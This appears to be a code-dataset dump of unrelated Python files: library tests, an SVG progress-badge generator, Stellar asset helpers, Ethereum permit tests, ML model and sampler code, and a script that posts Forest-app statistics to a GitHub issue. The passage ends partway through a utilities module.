id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
411345
|
import pytest
from kedro_mlflow.framework.cli.cli_utils import (
render_jinja_template,
write_jinja_template,
)
@pytest.fixture
def template_path(tmp_path):
return tmp_path / "template.py"
@pytest.fixture
def jinja_template(template_path):
with open(template_path, "w") as file_handler:
file_handler.write("fake file\n which contains {{ fake_tag }}. Nice, isn't it?")
return "fake file\n which contains 'Hello world!'. Nice, isn't it?"
@pytest.fixture
def cookiecutter_template(template_path):
with open(template_path, "w") as file_handler:
file_handler.write(
"fake file\n which contains {{ cookiecutter.fake_tag }}. Nice, isn't it?"
)
return "fake file\n which contains 'Hello world!'. Nice, isn't it?"
def test_render_jinja_template(template_path, jinja_template):
rendered = render_jinja_template(src=template_path, fake_tag="'Hello world!'")
assert rendered == jinja_template
def test_render_jinja_template_with_cookiecutter_tags(
template_path, cookiecutter_template
):
rendered = render_jinja_template(
src=template_path, fake_tag="'Hello world!'", is_cookiecutter=True
)
assert rendered == cookiecutter_template
def test_write_jinja_template(tmp_path, template_path, jinja_template):
rendered_path = tmp_path / "rendered.py"
write_jinja_template(
src=template_path, dst=rendered_path, fake_tag="'Hello world!'"
)
with open(rendered_path, "r") as file_handler:
rendered = file_handler.read()
assert rendered == jinja_template
def test_write_jinja_template_with_cookiecutter_tags(
tmp_path, template_path, cookiecutter_template
):
rendered_path = tmp_path / "rendered.py"
write_jinja_template(
src=template_path,
dst=rendered_path,
is_cookiecutter=True,
fake_tag="'Hello world!'",
)
with open(rendered_path, "r") as file_handler:
rendered = file_handler.read()
assert rendered == cookiecutter_template
|
411421
|
import pytest
from oval_graph.command_line_client.client import Client
from .constants_for_tests import PATH_TO_ARF_REPORT
def get_client(rule, optional_args=None):
path = str(PATH_TO_ARF_REPORT)
args = [path, rule]
if optional_args is not None:
args.extend(optional_args)
return Client(args)
def test_search_rules_id_not_implemented_error():
part_of_id_rule = 'xccdf_org.ssgproject.'
client = get_client(part_of_id_rule)
with pytest.raises(NotImplementedError):
assert client.search_rules_id()
def test_get_only_fail_rules_not_implemented_error():
part_of_id_rule = 'xccdf_org.ssgproject.'
client = get_client(part_of_id_rule)
with pytest.raises(NotImplementedError):
assert client.get_only_fail_rule(['rule-id'])
|
411443
|
class SVG_map:
"""
This class generates the svg for the API response
This class initializes itself with title, total range and progress.
It calculates the necessary measurements from these info to generate
the SVG.
Attributes
----------
__title__ : str
title of the progress-bar
__title_width__ : int
width of title for svg
__total_width__ : int
total width of svg
__progress__ : int
percentage of progress
__progressbar_width__ :
width of the progress-bar
__progress_color__ : str
color of the progress-bar depending on the perentage of progress
__green__ if progress > 66
__yellow__ if 66 >= progress > 33
__red__ if 33 >= progress > 0
__progress_details_x__ : int
position of progress details in X axis
__red__ : str
fill:rgb(240,113,120)
__yellow__ : str
fill:rgb(255,203,107)
__green__ : str
fill:rgb(195,232,141)"
__keys__ : tuple of str
keys for the svg_data_list dictionary
Methods
-------
generate()
generates and returns the SVG
"""
def __init__(self, title="Prog", total=100, progress=30):
"""
Parameters
----------
title : str
title of the progress-bar
total : int
total range of work
progress : int
progress of the work
"""
self.__set_default__()
self.__title__ = title
self.__title_width__ = len(title) * 8.5 + 10
self.__total_width__ = self.__title_width__ + 70
self.__progress__ = int(progress / total * 100)
self.__progress__ = self.__progress__ if self.__progress__ <= 100 else 100
self.__progressbar_width__ = int(self.__progress__ / 100 * 70)
self.__progress_color__ = self.__get_progress_color__(self.__progress__)
self.__progress_details_x__ = self.__get_progress_details_x__(self.__progress__)
def __set_default__(self):
"""
sets default attributes
"""
self.__green__ = "#c3e88d"
self.__red__ = "#f07178"
self.__yellow__ = "#ffcb6b"
self.__keys__ = (
"start",
"title_rect",
"title",
"progress_box",
"progress_bar",
"progress_details",
"error_text",
"end",
)
def __get_progress_details_x__(self, progress):
"""
Parameters
----------
progress : int
percentage of progress
Returns
-------
int
position of progress details in X axis
"""
if progress <= 9:
return self.__title_width__ + 25
elif progress <= 99:
return self.__title_width__ + 20
return self.__title_width__ + 15
def __get_progress_color__(self, progress):
"""
Parameters
----------
progress: int
percentage of progress
Returns
-------
str
returns __green__, __yellow__ or __red__
"""
if progress <= 33:
return self.__red__
elif progress <= 66:
return self.__yellow__
return self.__green__
def generate(self):
"""
Returns
-------
str
generates and returns SVG data as a str
"""
svg_data = {
"start": '<svg xmlns="http://www.w3.org/2000/svg" width="'
+ str(self.__total_width__)
+ '" height="20">',
"title_rect": '<rect rx="3" width="'
+ str(self.__title_width__)
+ '" height="20" fill="#0f111a"/>',
"title": '<text x="5" y="14" fill="#c792ea" style="font:700 13px sans-serif">'
+ self.__title__
+ "</text>",
"progress_box": '<rect x="'
+ str(self.__title_width__ - 5)
+ '" rx="3" width="70" height="20" fill="#464b5d"/>',
"progress_bar": '<rect x="'
+ str(self.__title_width__ - 5)
+ '" rx="3" width="'
+ str(self.__progressbar_width__)
+ '" height="20" fill="'
+ self.__progress_color__
+ '"/>',
"progress_details": '<text x="'
+ str(self.__progress_details_x__)
+ '" y="14" class="txt" '
+ 'fill="#fff" style="align:center;font:13px sans-serif">'
+ str(self.__progress__)
+ "%</text>",
"error_text": "Sorry, your browser does not support inline SVG.",
"end": "</svg>",
}
svg_data_list = [svg_data[key] for key in self.__keys__]
return "".join(svg_data_list)
|
411452
|
from typing import Union, Optional, List
from django.utils.translation import gettext
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from polaris.models import OffChainAsset, Asset, ExchangePair, DeliveryMethod
def asset_id_to_kwargs(asset_id: str) -> dict:
if asset_id.startswith("stellar"):
_, code, issuer = asset_id.split(":")
return {"code": code, "issuer": issuer}
else:
scheme, identifier = asset_id.split(":")
return {"scheme": scheme, "identifier": identifier}
def is_stellar_asset(asset: str) -> bool:
return asset.startswith("stellar")
def get_buy_assets(
sell_asset: Union[Asset, OffChainAsset],
buy_delivery_method: Optional[str],
country_code: Optional[str],
) -> List[Union[Asset, OffChainAsset]]:
asset_str = sell_asset.asset_identification_format
pairs = ExchangePair.objects.filter(sell_asset=asset_str).all()
if not pairs:
return []
buy_asset_strs = [p.buy_asset for p in pairs]
conditions = Q()
for asset_str in buy_asset_strs:
conditions |= Q(**asset_id_to_kwargs(asset_str))
if isinstance(sell_asset, Asset):
kwargs = {}
if country_code:
kwargs["country_codes__icontains"] = country_code
if buy_delivery_method:
kwargs["delivery_methods__type"] = DeliveryMethod.TYPE.buy
kwargs["delivery_methods__name"] = buy_delivery_method
buy_assets = (
OffChainAsset.objects.filter(conditions, **kwargs)
.prefetch_related("delivery_methods")
.all()
)
else:
if buy_delivery_method:
raise ValueError(
gettext(
"unexpected 'buy_delivery_method', "
"client intends to buy a Stellar asset"
)
)
buy_assets = Asset.objects.filter(conditions).all()
return list(buy_assets)
def get_buy_asset(
sell_asset: Union[Asset, OffChainAsset],
buy_asset_str: str,
buy_delivery_method: Optional[str],
country_code: Optional[str],
) -> Union[Asset, OffChainAsset]:
if isinstance(sell_asset, Asset):
kwargs = {}
try:
scheme, identifier = buy_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'buy_asset' format"))
kwargs["scheme"] = scheme
kwargs["identifier"] = identifier
if country_code:
kwargs["country_codes__icontains"] = country_code
if buy_delivery_method:
kwargs["delivery_methods__type"] = DeliveryMethod.TYPE.buy
kwargs["delivery_methods__name"] = buy_delivery_method
try:
buy_asset = OffChainAsset.objects.prefetch_related("delivery_methods").get(
**kwargs
)
except ObjectDoesNotExist:
raise ValueError(
gettext(
"unable to find 'buy_asset' using the following filters: "
"'country_code', 'buy_delivery_method'"
)
)
else:
if buy_delivery_method:
raise ValueError(
gettext(
"unexpected 'buy_delivery_method', "
"client intends to buy a Stellar asset"
)
)
try:
_, code, issuer = buy_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'buy_asset' format"))
try:
buy_asset = Asset.objects.get(code=code, issuer=issuer)
except ObjectDoesNotExist:
raise ValueError(
gettext(
"unable to find 'buy_asset' using the following filters: "
"'country_code', 'buy_delivery_method'"
)
)
if not ExchangePair.objects.filter(
sell_asset=sell_asset.asset_identification_format, buy_asset=buy_asset_str
).exists():
raise ValueError(gettext("unsupported asset pair"))
return buy_asset
def get_sell_asset(
sell_asset_str: str,
sell_delivery_method: Optional[str],
country_code: Optional[str],
) -> Union[Asset, OffChainAsset]:
try:
if is_stellar_asset(sell_asset_str):
if sell_delivery_method:
raise ValueError(
gettext(
"unexpected 'sell_delivery_method', "
"client intends to sell a Stellar asset"
)
)
try:
_, code, issuer = sell_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'sell_asset' format"))
return Asset.objects.get(code=code, issuer=issuer)
else:
try:
scheme, identifier = sell_asset_str.split(":")
except ValueError:
raise ValueError(gettext("invalid 'sell_asset' format"))
kwargs = {}
if country_code:
kwargs["country_codes__icontains"] = country_code
if sell_delivery_method:
kwargs["delivery_methods__type"] = DeliveryMethod.TYPE.sell
kwargs["delivery_methods__name"] = sell_delivery_method
return OffChainAsset.objects.prefetch_related("delivery_methods").get(
scheme=scheme, identifier=identifier, **kwargs
)
except ObjectDoesNotExist:
raise ValueError(
gettext(
"no 'sell_asset' for 'delivery_method' and 'country_code' specificed"
)
)
def find_delivery_method(
asset: Union[Asset, OffChainAsset],
delivery_method_name: str,
delivery_method_type: str,
) -> Optional[DeliveryMethod]:
if isinstance(asset, Asset):
return None
if not delivery_method_name:
return None
delivery_method = None
for dm in asset.delivery_methods.all():
if dm.type != delivery_method_type:
continue
if dm.name == delivery_method_name:
delivery_method = dm
break
return delivery_method
|
411548
|
import brownie
import pytest
from brownie import chain
from eth_account import Account
from eth_account.messages import encode_structured_data
amount = 100
owner = Account.create()
spender = Account.create()
def generate_permit(vault, owner: Account, spender: Account, value, nonce, deadline):
data = {
"types": {
"EIP712Domain": [
{"name": "name", "type": "string"},
{"name": "version", "type": "string"},
{"name": "chainId", "type": "uint256"},
{"name": "verifyingContract", "type": "address"},
],
"Permit": [
{"name": "owner", "type": "address"},
{"name": "spender", "type": "address"},
{"name": "value", "type": "uint256"},
{"name": "nonce", "type": "uint256"},
{"name": "deadline", "type": "uint256"},
],
},
"domain": {
"name": vault.name(),
"version": vault.version(),
"chainId": 1, # ganache bug https://github.com/trufflesuite/ganache/issues/1643
"verifyingContract": str(vault),
},
"primaryType": "Permit",
"message": {
"owner": owner.address,
"spender": spender.address,
"value": value,
"nonce": nonce,
"deadline": deadline,
},
}
return encode_structured_data(data)
@pytest.mark.parametrize("expiry", [True, False])
def test_permit(vault, expiry):
nonce = vault.nonces(owner.address)
expiry = chain[-1].timestamp + 3600 if expiry else 0
permit = generate_permit(vault, owner, spender, amount, nonce, expiry)
signature = owner.sign_message(permit).signature
assert vault.allowance(owner.address, spender.address) == 0
vault.permit(owner.address, spender.address, amount, expiry, signature)
assert vault.allowance(owner.address, spender.address) == amount
def test_permit_wrong_signature(vault):
nonce = vault.nonces(owner.address)
expiry = 0
permit = generate_permit(vault, owner, spender, amount, nonce, expiry)
signature = spender.sign_message(permit).signature
assert vault.allowance(owner.address, spender.address) == 0
with brownie.reverts("dev: invalid signature"):
vault.permit(owner.address, spender.address, amount, expiry, signature)
def test_permit_expired(vault):
nonce = vault.nonces(owner.address)
expiry = chain[-1].timestamp - 600
permit = generate_permit(vault, owner, spender, amount, nonce, expiry)
signature = owner.sign_message(permit).signature
assert vault.allowance(owner.address, spender.address) == 0
with brownie.reverts("dev: permit expired"):
vault.permit(owner.address, spender.address, amount, expiry, signature)
|
411554
|
import json
from fastapi import FastAPI, status, Body
from fastapi.responses import PlainTextResponse
from yes_predictor import PythonPredictor
my_app = FastAPI()
my_app.ready = False
my_app.predictor = None
@my_app.on_event("startup")
def startup():
with open("predictor_config.json", "r") as f:
config = json.load(f)
my_app.predictor = PythonPredictor(config)
my_app.ready = True
@my_app.get("/healthz")
def healthz():
if my_app.ready:
return PlainTextResponse("ok")
return PlainTextResponse("service unavailable", status_code=status.HTTP_503_SERVICE_UNAVAILABLE)
@my_app.post("/")
def post_handler(payload: dict = Body(...)):
return my_app.predictor.predict(payload)
|
411576
|
import numpy as np
from utils import *
from exponential_families import load_nodes
import csv
import scipy.sparse as sps
def get_node_map(nodes):
'''Calculate the mapping from data column to node.'''
cols = []
for i,node in enumerate(nodes):
cols.extend([i]*node.num_params)
return np.array(cols)
class MixedMRF:
def __init__(self, nodes, weights, neighbor_partitions):
self.nodes = nodes
self.weights = weights
self.neighbor_partitions = neighbor_partitions
self.obs_partitions = np.hstack([np.repeat(i, node.domain_size) for i, node in enumerate(nodes)])
self.ss_partitions = np.hstack([np.repeat(i, node.num_params) for i, node in enumerate(nodes)])
def calc_sufficient_statistics(self, data):
return np.hstack([node.sufficient_statistics(data[self.obs_partitions == i])[0] for i, node in enumerate(self.nodes)])
def gibbs_sample(self, start=None, verbose=False):
if start is None:
start = np.hstack([node.starting_x() for node in self.nodes])
if verbose:
print 'Starting: {0}'.format(pretty_str(start))
# Get the vector of sufficient statistics
sufficient_statistics = self.calc_sufficient_statistics(start)
if verbose:
print 'suff statistics: {0}'.format(pretty_str(sufficient_statistics))
# Create the resulting vector
result = np.copy(start)
for i,(node, weights) in enumerate(zip(self.nodes, self.weights)):
if verbose:
print ''
print 'Node #{0}: {1}'.format(i, node)
print 'Weights: {0}'.format(pretty_str(weights))
# Calculate the natural parameters
eta = weights[:,1:].dot(sufficient_statistics[self.ss_partitions != i]) + weights[:,0]
if verbose:
print 'Theta: {0}\nNatural params: {1}'.format(pretty_str(weights), pretty_str(eta))
sample = node.sample(eta)
result[self.obs_partitions == i] = sample
sufficient_statistics[self.ss_partitions == i] = node.sufficient_statistics(sample)
if verbose:
print 'gibbs sample: {0}'.format(pretty_str(result))
return result
def save_neighbors(self, filename):
save_list_of_arrays(filename, self.neighbor_partitions, fmt='%1i')
def save_weights(self, filename):
save_list_of_arrays(filename, self.weights)
def save_edges(self, filename, rel_tol=1e-4):
with open(filename, 'w') as f:
writer = csv.writer(f)
for i, (weights, neigh_part) in enumerate(zip(self.weights,self.neighbor_partitions)):
for j in xrange(i,len(self.weights)):
w = weights[:,neigh_part == j]
if np.abs(w).max() > rel_tol:
writer.writerow([i,j] + list(w.flatten()))
class SparsePseudoMixedMRF:
'''A sparse mixed MRF that uses the pseudo-likelihood to calculate the joint log-partition.'''
def __init__(self, nodes, edges):
self.nodes = nodes # list of ExponentialFamily objects
self.edges = edges # a list where each element is a tuple ((i,j), weight)
self.node_map = get_node_map(nodes)
self.jll = None
# Calculate the neighbors of each node and create the weight vectors
self.neighbors = [[] for _ in nodes]
self.weights = [[[0.] for _ in xrange(node.num_params)] for node in nodes] # Reserve the first weight for the bias term
self.weights_map = {}
for (i,j), w in edges:
inode = nodes[i]
# If this is the bias term
if i == j:
for k in xrange(inode.num_params):
self.weights[i][k][0] = w[k]
self.weights_map[(i,j)] = w
continue
# If this is an edge between neighbors
jnode = nodes[j]
w = w.reshape((inode.num_params, jnode.num_params))
self.neighbors[i].append(j)
self.neighbors[j].append(i)
for k in xrange(inode.num_params):
self.weights[i][k].extend(w[k])
for k in xrange(jnode.num_params):
self.weights[j][k].extend(w.T[k])
self.weights_map[(i,j)] = w
self.weights_map[(j,i)] = w.T
self.neighbors = [np.array(x) for x in self.neighbors]
self.weights = [np.array(x) for x in self.weights]
def set_data(self, data):
'''Set the sufficient statistics data to be used.'''
assert(data.shape[1] == len(self.node_map))
self.data = data
self.dirty = True
def joint_log_likelihood(self):
'''Calculates the joint log-pseudo-likelihood'''
if self.dirty:
result = 0.
for i, node in enumerate(self.nodes):
result += self.node_log_likelihood(i, node)
self.jll = result
return self.jll
def node_log_likelihood(self, node_id, node):
neighbors = self.neighbors[node_id]
# Figure out which columns can safely be deleted since they're unused
target_cols = np.where(self.node_map == node_id)[0]
neighbor_cols = np.where(np.in1d(self.node_map, neighbors))[0]
unused = np.delete(np.arange(self.data.shape[1]), np.hstack([target_cols, neighbor_cols]))
# Rearrange the data so that sufficient statistics of this node come first and any non-neighbor nodes are removed
neighbors_partition = np.hstack([[node_id], np.delete(self.node_map, unused)]).astype(np.int32)
c = np.delete(np.arange(self.data.shape[1]), unused)
data_subset = self.data[:, c]
weights = self.weights[node_id] # p x q+1
sufficient_stats = data_subset[:,0:node.num_params] # n x p
neighbor_stats = data_subset[:,node.num_params:] # n x q
# The results matrix is n x p, where n = # examples and p = # natural parameters for this node
results = np.zeros((sufficient_stats.shape[0], node.num_params))
# Add all the natural parameters
for i, w in enumerate(weights):
# Handle nodes without edges
if w.shape[0] < 2:
continue
if sps.issparse(sufficient_stats):
ss = sufficient_stats[:,i].A[:,0]
else:
ss = sufficient_stats[:,i]
results[:,i] += sps.diags(ss, 0).dot(neighbor_stats).dot(w[1:][:,np.newaxis])[:,0]
results[:,i] += ss * w[0]
# Calculate the log-partition function for each example
a = node.log_partition(results.T)
return results.sum() - a.sum()
def load_sparse_pseudomrf(experiment_dir, edges_path='edges/and_mle_edges.csv'):
if not experiment_dir.endswith('/'):
experiment_dir += '/'
nodes = load_nodes(experiment_dir + 'data/nodes.csv')
edges = load_edges(experiment_dir + edges_path)
return SparsePseudoMixedMRF(nodes, edges)
|
411645
|
r = input()
s = input()
a = r.split(",")
b = s.split(",")
count = 0
k = 0
for i in range(len(b)):
count = count + int(b[k])
k += 1
for j in a:
n = j.split(":")
if count == int(n[0]):
count = int(n[1])
if count>= 100:
print("Yes", end="")
else:
print("No", end="")
|
411669
|
import argparse
import json
from collections import Counter
from datetime import datetime
import pendulum
import requests
from github import Github
from .config import (
FOREST_CLAENDAR_URL,
FOREST_ISSUE_NUMBER,
FOREST_LOGIN_URL,
FOREST_SUMMARY_HEAD,
FOREST_SUMMARY_STAT_TEMPLATE,
FOREST_TAG_URL,
FOREST_URL_HEAD,
)
class Forst:
def __init__(self, email, password):
self.email = email
self.password = password
self.s = requests.Session()
self.year = datetime.now().year
self.user_id = None
self.plants = []
self.log_days = []
self.success_plants_count = 0
self.is_login = False
def login(self):
data = {"session": {"email": self.email, "password": <PASSWORD>}}
headers = {"Content-Type": "application/json"}
r = self.s.post(FOREST_LOGIN_URL, headers=headers, data=json.dumps(data))
if not r.ok:
raise Exception(f"Someting is wrong to login -- {r.text}")
self.user_id = r.json()["user_id"]
self.is_login = True
def make_plants_data(self):
date = str(self.year) + "-01-01"
r = self.s.get(FOREST_CLAENDAR_URL.format(date=date, user_id=self.user_id))
if not r.ok:
raise LoadError(f"Someting is wrong to get data-- {r.text}")
self.plants = r.json()["plants"]
# only count success trees
self.plants = [i for i in self.plants if i["is_success"]]
self._make_forest_dict()
def _get_my_tags(self):
r = self.s.get(FOREST_TAG_URL.format(user_id=self.user_id))
if not r.ok:
raise Exception("Can not get tags")
tag_list = r.json().get("tags", [])
tag_dict = {}
for t in tag_list:
tag_dict[t["tag_id"]] = t["title"]
return tag_dict
def make_year_stats(self):
if not self.is_login:
raise Exception("Please login first")
self.make_plants_data()
def _make_forest_dict(self):
if not self.plants:
self.make_plants_data()
tags_dict = self._get_my_tags()
d = Counter()
for p in self.plants:
d[tags_dict[p.get("tag")]] += 1
return d
@staticmethod
def _make_tag_summary_str(tag_summary_dict, unit):
s = FOREST_SUMMARY_HEAD
for k, v in tag_summary_dict.most_common():
s += FOREST_SUMMARY_STAT_TEMPLATE.format(tag=k, times=str(v) + f" {unit}")
return s
def make_new_table(self, token, repo_name, issue_number=FOREST_ISSUE_NUMBER):
u = Github(token)
issue = u.get_repo(repo_name).get_issue(FOREST_ISSUE_NUMBER)
unit = "个"
body = ""
tag_summary_dict = self._make_forest_dict()
for b in issue.body.splitlines():
if b.startswith("|"):
break
body += b
body = body + "\r\n" + self._make_tag_summary_str(tag_summary_dict, unit)
issue.edit(body=body)
def make_forst_daily(self):
end_date = pendulum.now("Asia/Shanghai")
start_date = end_date.start_of("year")
self.make_year_stats()
log_days = set(
[
pendulum.parse(i["created_at"], tz="Asia/Shanghai").to_date_string()
for i in self.plants
]
)
self.log_days = sorted(list(log_days))
total_plants = len(self.plants)
is_today_check = False
if end_date.to_date_string() in self.log_days:
is_today_check = True
periods = list(pendulum.period(start_date, end_date.subtract(days=1)))
periods.sort(reverse=True)
# if today id done
streak = 0
if end_date.to_date_string() in self.log_days:
streak += 1
# for else if not break not else
for p in periods:
if p.to_date_string() not in self.log_days:
break
streak += 1
# total plants, streak, is_today_check
return len(self.plants), streak, is_today_check
def get_forst_daily(email, password, github_token, repo_name):
f = Forst(email, password)
f.login()
# also edit the issue body
f.make_new_table(github_token, repo_name)
return f.make_forst_daily()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("email", help="email")
parser.add_argument("password", help="password")
parser.add_argument("github_token", help="github_token")
parser.add_argument("repo_name", help="repo_name")
options = parser.parse_args()
f = Forst(options.email, options.password)
f.login()
f._make_forest_dict()
print(f.make_new_table(options.github_token, options.repo_name))
|
411698
|
from pyui.geom import Size
from .base import View
class Rectangle(View):
def content_size(self, available: Size):
return available
|
411704
|
from typing import Iterable
import math
import numpy as np
from torch.utils.data import Sampler, BatchSampler
class SortishSampler(Sampler):
"""Returns indices such that inputs with similar lengths are close together."""
def __init__(self, sequence_lengths: Iterable, bucket_size: int, num_replicas: int = 1, rank: int = 0):
self.data = np.argsort(sequence_lengths)
self.num_replicas = num_replicas
self.num_samples = int(math.ceil(len(self.data) * 1.0 / self.num_replicas))
self.bucket_size = bucket_size
n_buckets = int(np.ceil(len(self.data) / self.bucket_size))
self.data = [self.data[i * bucket_size: i * bucket_size + bucket_size] for i in range(n_buckets)]
self.rank = rank
self.epoch = 0
self.total_size = self.num_samples * self.num_replicas
def __iter__(self):
np.random.seed(self.epoch)
for bucket in self.data:
np.random.shuffle(bucket)
np.random.shuffle(self.data)
indices = [item for sublist in self.data for item in sublist]
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
start = self.rank * self.num_samples
end = start + self.num_samples
indices = indices[start:end]
assert len(indices) == self.num_samples
return iter(indices)
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
self.epoch = epoch
class ApproxBatchSampler(BatchSampler):
"""
Parameters:
-----------
sampler : Pytorch Sampler
Choose base sampler class to use for bucketing
max_tokens : int
Maximum number of tokens per batch
max_batch: int
Maximum batch size
sample_lengths : array-like
List of lengths of sequences in the order of the dataset
"""
def __init__(self, sampler, max_tokens, max_batch, sample_lengths, max_square_tokens=np.inf):
self.longest_token = 0
self.max_tokens = max_tokens
self.max_batch = max_batch
self.sampler = sampler
self.sample_lengths = sample_lengths
self.max_square_tokens = max_square_tokens
def __iter__(self):
batch = []
length = 0
ell_sq = 0
for idx in self.sampler:
this_length = self.sample_lengths[idx]
linear = (len(batch) + 1) * max(length, this_length)
quadratic = (len(batch) + 1) * max(ell_sq, this_length ** 2)
if linear <= self.max_tokens and quadratic < self.max_square_tokens:
batch.append(idx)
length = max(length, this_length)
ell_sq = max(ell_sq, this_length ** 2)
if len(batch) == self.max_batch:
yield batch
batch = []
length = 0
else:
yield batch
batch = [idx]
length = this_length
ell_sq = this_length ** 2
if len(batch) > 0:
yield batch
|
411708
|
import time
import pyaudio
import numpy as np
from threading import Thread, Lock
class SoundStream(object):
def __init__(self, src=0):
self.started = False
self.read_lock = Lock()
self.sound = 0
self.chunk = np.zeros(1024, dtype=np.int16)
self.p = pyaudio.PyAudio()
input_index = self.get_channels(self.p)
self.channels = 1
self.rate = 16000
self.format = pyaudio.paInt16
self.stream = self.p.open(
format=self.format,
channels=self.channels,
rate=self.rate,
input_device_index = input_index,
input=True,
stream_callback=self.callback)
def start(self):
if self.started:
print("already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
self.read_lock.acquire()
self.sound = int(self.chunk.max())
self.read_lock.release()
def read(self):
self.read_lock.acquire()
sound = self.sound
self.read_lock.release()
return sound
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exc_type, exc_value, traceback):
self.stream.release()
def get_channels(self, p):
output_index = self.p.get_default_input_device_info()['index']
for idx in range(self.p.get_device_count()):
info = self.p.get_device_info_by_index(idx)
if 'BlackHole' in info['name']:
output_index = info['index']
return output_index
def callback(self, in_data, frame_count, time_info, status):
self.chunk = np.frombuffer(in_data, np.int16).copy()
return (in_data, pyaudio.paContinue)
|
411709
|
import runpy
from setuptools import setup, find_packages
__version__ = runpy.run_path("torch_em/__version__.py")["__version__"]
# NOTE requirements are not all available via pip, you need to use conda,
# see 'environment_gpu.yaml' / 'environment_cpu.yaml'
requires = [
"torch",
"h5py"
]
setup(
name="torch_em",
packages=find_packages(exclude=["test"]),
version=__version__,
author="<NAME>",
install_requires=requires,
url="https://github.com/constantinpape/torch-em",
license="MIT",
entry_points={
"console_scripts": [
"torch_em.export_bioimageio_model = torch_em.util.modelzoo:main",
"torch_em.validate_checkpoint = torch_em.util.validation:main",
"torch_em.submit_slurm = torch_em.util.submit_slurm:main",
]
}
)
|
411763
|
import json
import logging
import numpy as np
import os
from scipy.special import logsumexp
from time import time
from __init__ import project_root
from data_handlers.data_providers import load_data_providers, DataProvider
from utils.plot_utils import disp_imdata
from utils.project_constants import IMG_DATASETS
def get_waymark_data_dir(seq_id, dataset_name, current=True):
if current:
return project_root + "waymark_data/{}/id{}/".format(dataset_name, seq_id)
else:
return project_root + "waymark_data/{}/old/id{}/".format(dataset_name, seq_id)
def get_metrics_data_dir(model_save_dir, epoch_i=None):
if epoch_i is None:
metrics_save_dir = os.path.join(model_save_dir, "metrics/")
else:
metrics_save_dir = os.path.join(model_save_dir, "metrics/epoch_{}/".format(epoch_i))
os.makedirs(metrics_save_dir, exist_ok=True)
return metrics_save_dir
def make_logger():
logger = logging.getLogger("tf")
logger.setLevel(logging.DEBUG)
# create console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.propagate = False
def set_logger(log_path):
"""Sets the logger to log info in terminal and file `log_path`.
In general, it is useful to have a logger so that every output to the terminal is saved
in a permanent file. Here we save it to `model_dir/train.log`.
Taken from https://github.com/cs230-stanford/cs230-code-examples/blob/master/tensorflow/nlp/model/utils.py
Example:
```
logging.info("Starting training...")
```
Args:
log_path: (string) where to log
"""
logger = logging.getLogger()
logger.setLevel(logging.INFO)
if not logger.handlers:
# Logging to a file
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logger.addHandler(file_handler)
# Logging to console
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(stream_handler)
# noinspection PyUnresolvedReferences
def check_early_stopping(saver, sess, save_path, config):
val_loss = config["current_val_loss"]
best_val_loss = config["best_val_loss"]
saved = False
if val_loss and val_loss < best_val_loss:
config.best_val_loss = val_loss
config.n_epochs_until_stop = config.patience
saver.save(sess, save_path)
saved = True
do_break = False
val_loss_is_nan = val_loss and np.isnan(val_loss)
if (config.n_epochs_until_stop <= 0) or val_loss_is_nan:
do_break = True
return do_break, saved
def update_time_avg(config, pre_sample_time, time_key, counter_key):
"""Update a running average of a time stored in config[time_key].
This is useful for tracking the average time spent on an operation
performed multiple times during learning e.g sampling noise once an epoch"""
new_time = time() - pre_sample_time
cur_mean_time, num = config.get(time_key, 0), config.get(counter_key, 0)
config[time_key] = (num * cur_mean_time + new_time) / (num + 1)
config[counter_key] = num + 1
def get_mcmc_intervals(mcmc_params):
start, stop, num, thinning_factor = mcmc_params
step_sizes = np.linspace(start, stop, num) ** 2
return [[2, thinning_factor, s] for s in step_sizes]
def seperately_permute_matrix_cols(X, transpose=False):
if transpose: X = X.T
X = X[..., np.newaxis] # (n, d, 1)
X = DataProvider.independent_sliced_shuffle(X) # (n, d, 1)
X = np.squeeze(X, axis=-1) # (n, d)
if transpose: X = X.T
return X
def save_config(config, save_dir=None):
if not save_dir:
save_dir = config["save_dir"]
os.makedirs(save_dir, exist_ok=True)
# ensure that there are no np.floats, np.ints or np.ndarrays since they aren't serializable
is_np_float = lambda x: isinstance(x, (np.float32, np.float64))
is_np_int = lambda x: isinstance(x, (np.int32, np.int64))
bad_keys = []
for key, val in config.items():
if is_np_float(val):
config[key] = float(val)
elif is_np_int(val):
config[key] = int(val)
elif isinstance(val, list) and is_np_float(val[0]):
config[key] = [float(v) for v in val]
elif isinstance(val, list) and is_np_int(val[0]):
config[key] = [int(v) for v in val]
elif isinstance(val, np.ndarray): # don't save arrays
bad_keys.append(key)
for key in bad_keys:
del config[key]
with open(save_dir + "/config.json", 'w') as fp:
json.dump(config, fp, indent=4)
# noinspection PyUnresolvedReferences
def load_data_providers_and_update_conf(config, include_test=False, dataset_name=None, shuffle=True, only_val=False, use_labels=False):
dataset_name = config["dataset_name"] if dataset_name is None else dataset_name
train_dp, val_dp, test_dp = load_data_providers(dataset_name,
config["n_batch"],
seed=config["data_seed"],
use_labels=use_labels,
frac=config["frac"],
shuffle=shuffle,
data_args=config["data_args"])
config.update({"n_dims": int(train_dp.n_dims), "n_samples": int(train_dp.n_samples)})
config.update({"n_val_samples": int(val_dp.n_samples)})
config.update({"train_data_stds": np.std(train_dp.data, axis=0)})
config.update({"train_data_min_max": [train_dp.data.min(), train_dp.data.max()]})
print("n_train, n_val: {}, {}".format(train_dp.n_samples, val_dp.n_samples))
if hasattr(train_dp.source, "cov_mat"):
config.update({"cov_mat": train_dp.source.cov_mat})
if hasattr(train_dp.source, "logit_alpha"):
config.update({"logit_alpha": train_dp.source.logit_alpha})
if hasattr(train_dp.source, "logit_shift"):
config.update({"preprocess_logit_shift": train_dp.source.logit_shift})
if hasattr(train_dp.source, "shift"):
